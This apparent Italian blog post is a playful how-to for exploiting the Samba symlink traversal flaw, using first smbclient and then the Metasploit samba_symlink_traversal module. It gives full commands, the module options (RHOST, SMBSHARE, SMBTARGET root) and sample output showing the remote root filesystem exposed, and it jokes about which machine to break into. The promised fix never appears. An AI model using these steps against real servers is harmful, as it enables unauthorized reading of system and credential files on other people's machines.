Ehehe anche i programmi per linux, a volte soffrono di gravi bug, dovuti a qualche incertezza durante la programmazione.
Questo fattore, permette a chi vuole attaccare una condivisione remoto di leggere non solo la condivisione, ma anche i file nelle altre cartelle.
Vediamo ora come sfruttare questo semplice exploit con metasploit (e non) e come fixare questa vulnerabilità.
Facciamo un esempio, facciamo finta che dal mio ubuntu CLSHACK-PC abbia condiviso la cartella MUSICA.
Ora, da un altro mio pc ubuntu ci accederò cosi:
smbclient -Usmb //CLSHACK-PC/MUSICA/
e Avrò questo output:
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: >
Ora ad esempio, utilizzando il comando ls, posso listare i file che risiedono dentro la condivisione.
Ma se volessi li stare i file in etc?
nessun problema, samba me lo permette :D
Quindi digito:
smb: >
symlink DESTINAZIONE file
Ora spostiamoci nella cartella file e buon divertimento :)
Usare questo exploit con metasploit ?
Semplice, aggiorniamolo digitando:
svn update
Ora, apriamolo e digitiamo:
use auxiliary/admin/smb/samba_symlink_traversal
Macchina da bucare :)
set RHOST IP_REMOTO
set SMBSHARE NOME_CONDIVISIONE
set SMBTARGET root
run
Avremo questo output(simile):
msf auxiliary(samba_symlink_traversal) > run
[*] Connecting to the server...
[*] Trying to mount writeable share jar...
[*] Trying to link 'root' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \192.168.0.152jarroot
Perfetto ora spostiamoci nella condivisione:
IP_REMOTO/CONDIVISIONE/root
E buon divertimento :)
Pingback: [Samba EXPLOIT]Symlink Traversal (guida metasploit)